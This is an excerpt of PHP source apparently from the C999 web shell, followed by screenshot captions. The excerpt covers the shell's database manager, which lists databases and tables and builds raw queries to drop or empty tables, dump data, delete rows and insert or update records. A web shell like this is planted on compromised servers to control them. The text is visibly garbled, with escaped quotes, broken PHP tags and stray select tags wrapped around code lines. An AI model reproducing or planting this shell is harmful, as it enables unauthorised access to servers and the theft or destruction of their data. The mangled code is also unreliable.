1079 <td valign="top" width="25%" height="100%"><a href="<?php echo $surl.">"><b>Home</b></a>
1080 
1081 <hr noshade="noshade" size="1" />
1082 
1083 <!--?php <br ?--> $result = mysql_list_tables($sql_db);
1084  if (!$result) {echo mysql_smarterror();}
1085  else
1086  {
1087  echo "---[ <a href="\&quot;&quot;.$sql_surl.&quot;&\&quot;"><b>".htmlspecialchars($sql_db)."</b></a> ]---
1088 ";
1089  $c = 0;
1090  while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>� <a href="\&quot;&quot;.$sql_surl.&quot;sql_db=&quot;.htmlspecialchars($sql_db).&quot;&sql_tbl=&quot;.htmlspecialchars($row[0]).&quot;\&quot;"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</b>"; mysql_free_result($count); $c++;}
1091  if (!$c) {echo "No tables found in database.";}
1092  }
1093  }
1094  else
1095  {
1096  ?></td>
1097 <td valign="top" width="1" height="100"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a>
1098 
1099 <hr noshade="noshade" size="1" />
1100 
1101 <!--?php    $result = mysql_list_dbs($sql_sock);    if (!$result) {echo mysql_smarterror();}    else    {     ?-->
1102 <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql" /><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>" /><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>" /><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>" /><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>" />
1103 <select name="sql_db"><!--?php <br ?--> $c = 0;</select>
1104 <select name="sql_db">$dbs = "";</select>
1105 <select name="sql_db">while ($row = mysql_fetch_row($result)) {$dbs .= "</select>
1106 <select name="sql_db"><option selected="selected" value="\&quot;&quot;.$row[0].&quot;\&quot;&quot;;">".$row[0]."</option></select>
1107 <select name="sql_db">"; $c++;}</select>
1108 <select name="sql_db">echo "</select>
1109 <select name="sql_db"><option value="\&quot;\&quot;">Databases (".$c.")</option></select>
1110 <select name="sql_db">";</select>
1111 <select name="sql_db">echo $dbs;</select>
1112 <select name="sql_db">}</select>
1113 <select name="sql_db">?></select>
1114 
1115 <hr noshade="noshade" size="1" />
1116 
1117 Please, select database
1118 
1119 <hr noshade="noshade" size="1" />
1120 
1121 <input type="submit" value="Go" /></form>
1122 <!--?php <br ?--> }
1123  //End left panel
1124  echo "</td>
1125 <td valign="\&quot;top\&quot;" width="\&quot;100%\&quot;" height="\&quot;1\&quot;">";
1126  //Start center panel
1127  $diplay = TRUE;
1128  if ($sql_db)
1129  {
1130  if (!is_numeric($c)) {$c = 0;}
1131  if ($c == 0) {$c = "no";}
1132  echo "
1133 
1134 <hr noshade="noshade" size="\&quot;1\&quot;" />
1135 
1136 <center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
1137 ";
1138  if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href="\&quot;&quot;.$item[1].&quot;\&quot;">".$item[0]."</a> ] ";}}
1139  echo "</b></center>";
1140  $acts = array("","dump");
1141  if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1142  elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
1143  elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
1144  elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1145  elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1146  elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1147  elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
1148  elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
1149  elseif ($sql_tbl_act == "insert")
1150  {
1151  if ($sql_tbl_insert_radio == 1)
1152  {
1153  $keys = "";
1154  $akeys = array_keys($sql_tbl_insert);
1155  foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1156  if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1157  $values = "";
1158  $i = 0;
1159  foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1160  if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1161  $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1162  $sql_act = "query";
1163  $sql_tbl_act = "browse";
1164  }
1165  elseif ($sql_tbl_insert_radio == 2)
1166  {
1167  $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1168  $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1169  $result = mysql_query($sql_query)
1170 ?>

C999 shell Screenshot

C999 shell script screenshot

C999 shell script screenshot